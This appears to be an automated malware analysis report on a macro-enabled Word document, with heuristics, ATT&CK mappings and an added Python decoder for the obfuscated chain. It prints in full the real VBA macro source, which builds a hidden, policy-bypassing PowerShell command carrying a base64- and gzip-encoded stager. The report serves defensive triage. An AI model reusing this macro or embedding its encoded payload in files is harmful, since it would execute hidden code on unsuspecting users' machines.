Verdict: MALICIOUS (risk score 442)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
This document contains a VBA macro (Sub MyMacro in module NewMacros) that assembles a command line in a string variable, 50 characters at a time, and executes it through CreateObject("Wscript.Shell").Run. The reconstructed command is: powershell.exe -nop -w hidden -ExecutionPolicy Bypass -e [base64 encoded string]. The -e argument is base64 over UTF-16LE text; decoding it yields a launcher that selects the 32-bit powershell.exe under %windir%\syswow64 when the host process is 64-bit, builds a System.Diagnostics.ProcessStartInfo with a hidden window (WindowStyle='Hidden', CreateNoWindow=$true), and starts a child powershell -nop -w hidden -c that feeds a second base64 blob through FromBase64String, GzipStream and StreamReader and runs the result with [scriptblock]::create. That inner blob begins with H4sI (the base64 form of the gzip magic), is carried inline in the macro, and is not decompressed in this report. Nothing in the decoded outer layer contains a URL or a download call, so the ClamAV "Downloader" name should not be read as evidence of a network fetch at this layer: the visible code is an in-memory PowerShell stager, and whether the inner script downloads further content or injects shellcode directly can only be settled by inflating that blob. Note also that the decompressed source defines no AutoOpen, Auto_Open or Document_Open procedure; the only auto-execution evidence is the p-code heuristic listed under Heuristics.
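To reproduce the reconstruction described above end to end, here is an added example (not code from the report or from the analysis platform) that reassembles the chunked Str literals, decodes the -e argument as base64 over UTF-16LE, and inflates the inner gzip blob. Because the report does not decompress the real inner stage, the VBA the block runs on by default is constructed inside it from a placeholder script, wrapped in the same launcher shape as the decoded command; analyse_file() takes the path of the carved macros.bas to run the same decoder on the real sample.

```python
"""Unwrap the macro -> powershell -e -> gzip+base64 chain described above.

Added example, not code from the report or from the analysis platform.
The VBA text it runs on by default is constructed here to mirror the layout
of the extracted macros.bas (chunked Str = Str + "..." literals, then
CreateObject("Wscript.Shell").Run Str); the inner stage is a harmless
placeholder so there is something to unwrap. analyse_file() takes a real
macros.bas path instead.
"""
import base64
import gzip
import re

# Placeholder inner script (assumption: stands in for the undecoded blob).
STAGE2 = "Write-Output 'stage two placeholder'"


def build_outer_command(stage2: str) -> str:
    """Reproduce the launcher shape seen in the decoded -e payload: pick the
    32-bit powershell.exe, then run a child that inflates base64(gzip(script))."""
    blob = base64.b64encode(gzip.compress(stage2.encode("utf-8"))).decode()
    return (
        "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+"
        "'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};"
        "$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;"
        "$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object "
        "System.IO.StreamReader(New-Object System.IO.Compression.GzipStream("
        "(New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String("
        f"''{blob}''))),[System.IO.Compression.CompressionMode]::Decompress)))"
        ".ReadToEnd()))';$s.UseShellExecute=$false;$s.CreateNoWindow=$true;"
        "$p=[System.Diagnostics.Process]::Start($s);"
    )


def build_sample_vba(stage2: str = STAGE2, chunk: int = 50) -> str:
    """Emit VBA in the same chunked form as the extracted macro (constructed)."""
    enc = base64.b64encode(build_outer_command(stage2).encode("utf-16le")).decode()
    cmd = "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -e " + enc
    lines = ["Sub MyMacro()", "Dim Str As String"]
    lines += [f'Str = Str + "{cmd[i:i + chunk]}"' for i in range(0, len(cmd), chunk)]
    lines += ['CreateObject("Wscript.Shell").Run Str', "End Sub"]
    return "\n".join(lines)


# --- decoding side: what an analyst runs over the carved macros.bas ---------
CONCAT_RE = re.compile(r'Str\s*=\s*Str\s*\+\s*"((?:[^"]|"")*)"')
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
BLOB_RE = re.compile(r"FromBase64String\(\s*'+([A-Za-z0-9+/=]+)'+\s*\)")
NET_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|"
                    r"Net\.WebClient|Start-BitsTransfer|https?://", re.I)


def reassemble_vba_string(vba_source: str) -> str:
    """Join the chunked literals in order; VBA doubles an embedded quote."""
    return "".join(m.group(1).replace('""', '"') for m in CONCAT_RE.finditer(vba_source))


def decode_encoded_command(cmdline: str) -> str:
    """powershell -e / -EncodedCommand takes base64 over UTF-16LE text."""
    m = ENC_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument in command line")
    return base64.b64decode(m.group(1)).decode("utf-16le")


def unwrap_gzip_blob(decoded_ps: str) -> str:
    """Pull the FromBase64String('...') operand and inflate it if it is gzip."""
    m = BLOB_RE.search(decoded_ps)
    if not m:
        raise ValueError("no FromBase64String blob in decoded script")
    raw = base64.b64decode(m.group(1))
    if raw[:2] != b"\x1f\x8b":          # gzip magic; its base64 form starts with H4sI
        raise ValueError("blob is not gzip-compressed")
    return gzip.decompress(raw).decode("utf-8", errors="replace")


def analyse(vba_source: str) -> dict:
    """Decode both layers and record the launcher traits worth triaging."""
    cmdline = reassemble_vba_string(vba_source)
    outer = decode_encoded_command(cmdline)
    stage2 = unwrap_gzip_blob(outer)
    return {
        "launcher": cmdline.split(" -e ")[0],
        "forces_32bit_powershell": "syswow64" in outer.lower(),
        "hidden_window": "-w hidden" in cmdline.lower() and "createnowindow=$true" in outer.lower(),
        "network_fetch_visible": bool(NET_RE.search(outer + stage2)),
        "stage2": stage2,
    }


def analyse_file(path: str) -> dict:
    """Convenience wrapper for a carved macros.bas on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return analyse(fh.read())


if __name__ == "__main__":
    for key, value in analyse(build_sample_vba()).items():
        print(f"{key}: {value}")
```

The network_fetch_visible flag is the check that settles the "downloader" question for a given sample: it is False on the constructed input, and on the real macros.bas it reports whether either decoded layer contains a fetch, while the returned stage2 string is what you read next to see what the inner script actually does.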
Heuristics (9)

- ClamAV: Doc.Downloader.Pwshell-10001336-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0.
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings). Document contains a VBA project; VBA macros are present.
- Shell() call in VBA (critical, OLE_VBA_SHELL). Matched line in script: CreateObject("Wscript.Shell").Run Str. The match is on the "Wscript.Shell" ProgID string; the extracted source contains no call to the VBA Shell() function itself, so the OLE_VBA_SHELL, OLE_VBA_WSCRIPT and OLE_VBA_CREATEOBJ findings all describe this one line.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: CreateObject("Wscript.Shell").Run Str
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched lines in script:
  Str = Str + "powershell.exe -nop -w hidden -ExecutionPolicy By"
  Str = Str + "pass -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAeg"
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: CreateObject("Wscript.Shell").Run Str
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Caveat for this sample: the decompressed source (macros.bas) defines only Sub MyMacro() and no AutoOpen, Auto_Open or Document_Open procedure, so the auto-exec token has no counterpart in the visible source. Confirm the trigger with a p-code disassembly (for example pcodedmp) before concluding that the macro fires on open; a mismatch between p-code and source is also the signature of VBA stomping.
- Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 16 URLs below come from document text (OOXML body / shared strings) and are XML schema namespace declarations of the kind Word writes into a .docx; none of them is a host the macro contacts:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8673 bytes |

SHA-256: d5843a9f6b2194755e487d5d00c29393eb14df2e97f464aa3ab2f5c5e8a92f1c
Preview: first 1,000 lines of the extracted script (the listing ends at End Sub, so the complete module source is shown):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub MyMacro()
Dim Str As String
Str = Str + "powershell.exe -nop -w hidden -ExecutionPolicy By"
Str = Str + "pass -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAeg"
Str = Str + "BlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBz"
Str = Str + "AGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9AC"
Str = Str + "QAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8A"
Str = Str + "dwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQ"
Str = Str + "BsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAu"
Str = Str + "AGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAH"
Str = Str + "QAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMA"
Str = Str + "cwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOw"
Str = Str + "AkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBB"
Str = Str + "AHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAG"
Str = Str + "gAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQA"
Str = Str + "YgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdw"
Str = Str + "AtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBT"
Str = Str + "AHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAG"
Str = Str + "oAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAA"
Str = Str + "cgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKA"
Str = Str + "AoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAu"
Str = Str + "AEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAF"
Str = Str + "MAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIA"
Str = Str + "bwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANA"
Str = Str + "BzAEkAQQBGADYAbgBYAG0ARQBDAEEANwBWAFcAYQAyAC8AYQBT"
Str = Str + "AEIAVAA5AG4ARQBqADUARAAxAGEARgBaAEYAcwBpAHYATQBJAD"
Str = Str + "IAVABhAFIASwBhAC8ATQAwAHcAUQBuAGcAWQBBAEkAVQBWAFkA"
Str = Str + "TQA5AHQAaQBlAE0AUABYAFEAOABEAG8AOQB1AC8ALwB0AGUAZw"
Str = Str + "A1ADIAbQBTAHIAcgBiAHIAcgBRAFcAaQBQAEgATQBmAFoANQA3"
Str = Str + "ADcAaAAyADgASgBIAEkARQBZAFoARwBVAGYASgBHACsAbgBwAD"
Str = Str + "IAZQBEAEIAQgBIAG8AYQBRAFUAbABzAE8AdwBLAEIAWABZAC8A"
Str = Str + "YwBOAEkAUABUAG0AQgAvAFkASwA3AEQASwBTAFAAawBqAEwAWA"
Str = Str + "AxAHUAcwBtAEMAeABHAEoARgB0AGYAWABqAFkAUgB6AEgASQBu"
Str = Str + "AGoAZQA2AG0ARABoAFIAYgBIAE8ARgB4AFMAZwBtAE4ARgBsAG"
Str = Str + "YANgBTAEoAZwBIAG0AKwBQAHgAdQArAFkAZwBkAEkAWAAyAFYA"
Str = Str + "QwBwADkATABIAGMAcQBXAGkARwBaAGkAdQB3AFoAeQBBAGkAeQ"
Str = Str + "BkAGEANQBHAGIAbgB2AFcAWgBnADkASgBRAFMAdABhAGEARQBx"
Str = Str + "AEgASQBuAHoANwBKADYAdgB5ADgAdQBpAGkAMQB2AGkAUwBJAH"
Str = Str + "gAbwBwAHMANwBXAEsAQgB3ADUASgBMAHEAYQB4AEsAMwA5AFQA"
Str = Str + "VQA0AGYAMQB1AGoAUgBYAFoASgBBADUAbgBNAGYATgBFAGEAVQ"
Str = Str + "BLAGkAaQAxAHAAcABIAE0AWABJAHcANwBkAGcANwBRAG0AYgBX"
Str = Str + "AEEAVABNAGoAVwBVAFYAawBvAEEAUAB4AHkATABoAGsAWgBTAG"
Str = Str + "0AawArAG8AZgBUAHgAVQBaAGwAZwBQAE8ASABNADEAMQBPAFkA"
Str = Str + "NQBqAHUAUwBqAE4AVQA4AHYAegB4AGUASgBQAFoAWgA2ADUASA"
Str = Str + "BTAFcAUgBJAEMARQB1AEcAWgBIAEEAbgBLADAAdAB6AEoAKwBJ"
Str = Str + "AGcAKwBOAFMARgAwAFUAdQB4AFMAUABzAEwAVQBEAEwARQBwAH"
Str = Str + "gARQAvAGsASgBWAFEAZQB5AEoAcgBiAEIAUwBpAEIASgBLAGkA"
Str = Str + "OQBMAHYAbQBGAEYAdQA4AFMAWQBIADcAVgBlAFYAbABKAGQASw"
Str = Str + "BJAEQAVQBRAFgAQwAxAEMARwBWACsAbgBhAFQASQAzAG8AZgBp"
Str = Str + "AG8ASwBMADgAUgBaADEAcAA1AEYAWgA2ADgAKwBvAEQAYgB0AD"
Str = Str + "cAUABUAHMAMQBNAHYASgA4AHIATwBxAEwAOQBrAEMAcQB4AE8A"
Str = Str + "NQBvAGMAMQBoAHQAaQBVAEEAWQB2AEoAUQBlAHkAagBWAEMAbA"
Str = Str + "BLAEoAcgBoAEIAZwB2AEUAZAB2AEIAYgB1AGUAWQBMAFYAeABU"
Str = Str + "AE8AeQBVAG0ASABaAHYATQBQAEYAbgArAHQAWABjADIARQBRAF"
Str = Str + "oAUwBuADUANQBqAFkAagA3AGcASQBVAHMAbABvAFcAQQB1ADMA"
Str = Str + "aABNADAAbwBQAGYAawA3AEsASgB2AFoASQBoAEoAdQA3AEMASQ"
Str = Str + "BYAEUAeQBYAG0AbgB2AEEAVQB4ADkAaQBnACsAWgBGAGoASwB4"
Str = Str + "AFcANABoAEoAawBYAE8ARAByAEQAYgB4AEIAVAA3AFMASwBTAG"
Str = Str + "8AcABaAFYAKwBwAGQAWQBLAGkAWABqAFcAMQBSAE4AQwBYAGMA"
Str = Str + "dwAxAEIAOABvAFUAUQAxAFIAUQBRAGYAWABIAFkASQA2AEYAVQ"
Str = Str + "BHAFEAagBNAG4ARQBJAEUAQgAzAGYAZwBYAG8ARgBEADkAaQBP"
Str = Str + "AGMAKwBtAE0ANABiAHYAYwBlAC8AbwBPAFEAbgBLAEQAbwBqAG"
Str = Str + "cAdQBTAG8ATQBFADIAcwAwAHAAUwBoAFoARwBGAEwAdABGAFMA"
Str = Str + "WQB0AGkAawBoADEAcABpAFcAQwBIAHAAZgB3ADkAWABEAE8AaA"
Str = Str + "BnAGoAZwBvAEYAcgBtADUAaABmAG8ATQBaAE8AYQB3AHcAYQBK"
Str = Str + "AFkAOABNAFMAQgBzAGsASAB5ADkAOQBZAGEATwB3AFQAUgBGAE"
Str = Str + "kAdQBpADEAQwBVAHUAMQBuAGMAVwA4AFgAUABIADgAcAB0AEkA"
Str = Str + "TgBCAEMAbAAwAEEAWgBnADYAUQBrAHEAQQBUAHMAcABBAHAAWg"
Str = Str + "BJAHkAYwBBAGgAeABrAFAAaAAxAFoASwBGAGgAUgBHAHUASwBR"
Str = Str + "ADUAQgA1AHQARAA0AGIAWQBwADgAYQBQAE8ATQA3AEEAZgAyAE"
Str = Str + "kAQgArADcAOABxAHMAUQBjAHoAbwBmAHUAWgB1AGkAawBjAFAA"
Str = Str + "dwBJAGsAQQBvAHMAVQBXAFoASwBFAG8AMgA0AFEASQBHAFMASQ"
Str = Str + "BvAHMAQwAvADYAYgA5AHgAZQBEADQAeABoAEgAZwArAE8AcwBG"
Str = Str + "AGsAcgBlAEkASABOADkASgAxAEoAZQBGADcANgBNAHQASgBTAF"
Str = Str + "QARwBTAHcASABFAEwAZwBBAEEATgBxAGMAaABUAHEASwA4AGYA"
Str = Str + "dgA2AGMAVQBvAG8ANwA4AHAAMwBwAEsASABCAE0AegBVAGkAYQ"
Str = Str + "BqAHIANgBpAGwAUwAxAEQAYQBrAGEASgBuAHoASAA1AE0ASgBn"
Str = Str + "AHoAVQB2ADMAcAB2AGYAWQBMAGYAUABtAE4AdgBBADAASQB6AG"
Str = Str + "IATQA3AHEAQQA1ADcASABiAHIAVAB6ADMATAByAGcAdQByAFoA"
Str = Str + "WQBpAGIAZwBTAEgATQAxAHMAUABqAG8ANgBWADEAUgArAE8AcA"
Str = Str + "BtAEIAbABhADkANQA1AFUAVgB0AFAANgBmAHQAMABqAGUANgB1"
Str = Str + "AHYAdQBkAE4AdAArAGYAMQBlADMAMgA4AHEAKwBuAGIALwA2AE"
Str = Str + "wAdgBlAHQATwBsADUALwBxAFYAbgBqAGEAcAAvAHQARQBsAC8A"
Str = Str + "MABoAGoAcQBsAFIAcgBxAE4AMQB0AEoAZgA2AEoAdgA5AEUAbw"
Str = Str + "A5AGIAcABGAE4AZAAwAGoARwB3ADEAVwB2AEwAWgBaAFQAbQA2"
Str = Str + "AEsAeABWAC8AWQBmAHEAbABlAEkAYgBQAHYAOAAwAGEANAB5AG"
Str = Str + "MAMgA5AG8AVwBpAGUANABjAFAAWQA5AHoAKwA0AEUAcAByAHUA"
Str = Str + "YgBkAHMAdABYAGsALwBwAEsAYQAyAGwAYQBJADIAcgBaAGIAWg"
Str = Str + "AzAGQAVABIAFcAdQBEAGMAcgAyAHUASwAwAFAAeAB5ADEAOQBP"
Str = Str + "AEkAUwA5ADkAMwA3AFoAcQA4AE0AZQByAGIARQAyAE0AaAB2AE"
Str = Str + "0ALwBhAEEAegB6AGQAZABHAEQAMABZAFUAbwBrAEMAZgAyAEQA"
Str = Str + "VQB5AFcAegArAE0AQQByAEQAVgBoAGgARABNAGMAcQBWAHUAdQ"
Str = Str + "BIAGoATABQAHYAUQBuAHgASAA0AHEAMgA2AGgAegBLADIAWgBh"
Str = Str + "AG8AMQBlAHYAdQBnAC8AMgB2AGwAdABEAFEAVwA5AG0ASgAvAD"
Str = Str + "IAcgBXAGUAeQAyAGUAcwAyAE4AcgBrADIAcgByAFoANwBlADcA"
Str = Str + "RwBpAHQAMABYAGoAYwBuAGsAMwBzADEAVwB4AHkAVAAyAGUAVA"
Str = Str + "BjAFgAWABHAHMATABNAHAAQgAyAEMARABZAFAAMwBPAFgAaQAz"
Str = Str + "AEwAWgBzAGMAMwBnAG0AMwBWAEIAMQArAFgAQgAvAHMAaABDAG"
Str = Str + "UAbQB5ADUAcABhAHYAeABoAC8AMABhAEgAUABqAEQANQA1ADgA"
Str = Str + "ZAB6AGkANQBIAEcAMQB2AGQAOABzAGEAMAA4AGIAbABzAHYAMA"
Str = Str + "B1ADUAUQBLAFEAbwBiAEQAaQB5AC8AdQByAEYAMABYACsAMgBY"
Str = Str + "AHcAMgBFAFkAOABEAFIASwBIADQATQBIAG4AegBsAG0AcwB6AD"
Str = Str + "MAcwA2AEcANgBZAEMAUgBWAEUATgBSADQAUABaAGQAWQBSADUA"
Str = Str + "aABDAHIAYwBYADMARwA4ADUAWgB6AFYASwBtAFoATQBPADgAbg"
Str = Str + "BUAG8AdwBoADEAeQBuAE8AegBwAFIAVABPAEcANQBVAFgAdAB6"
Str = Str + "AFoAVQBxAFAAUQB1AHEAMwB3AGQAOAB2AG4AVgA5AFAAWQBNAF"
Str = Str + "EAbwBRADIAQQBwAHEAVQArAGoAbgB3AFIARgBDAHYAYgBpADAA"
Str = Str + "bwBGAHgAbgBWAGwAVwA2ADkAQQBpAHIAKwBlAFYAWQBPAHQAZA"
Str = Str + "AwAHAAcQBxAFoAaABPACsAeQBNAHMAbQBXAGwANgBNAEsAMgBt"
Str = Str + "AG4AVgBIAFkATgBmADkAUAByAEwASgBlAEQATwBEAEgALwBSAG"
Str = Str + "UAcwB2AHUALwA5AHcAKwBrAHYANABWAGMAcABaAHQAbQArADIA"
Str = Str + "dgA5AHgANAA3AGYAZwAvAE0AMwBFAEoANABnAEkAawBMAE4AZw"
Str = Str + "BsAGwAQgA4AHYATQAzAGUAegBEACsAagB4AFkAdgBMAGYAdABl"
Str = Str + "AEUAbQBuAHYAWgBrAC8ANQBUAHUAMAB2AEUAKwBTADMAOABBAH"
Str = Str + "oAZwA3AC8AUgB0ADkANgBSAFUAeQBFAFEAbwBBAEEAQQA9AD0A"
Str = Str + "JwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbw"
Str = Str + "BtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBp"
Str = Str + "AG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAH"
Str = Str + "MAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcA"
Str = Str + "OwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQ"
Str = Str + "A9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0"
Str = Str + "AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAH"
Str = Str + "UAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcA"
Str = Str + "SABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4Abw"
Str = Str + "BXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5"
Str = Str + "AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAH"
Str = Str + "IAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA"
CreateObject("Wscript.Shell").Run Str
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 25600 bytes |

SHA-256: 4f7db73c6ad335df6ecb5ff15cf54a5275cca94d3fd825fd15fced076840824b
Detection
ClamAV: Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload: likely. Carved artifact contains a PowerShell -EncodedCommand style payload.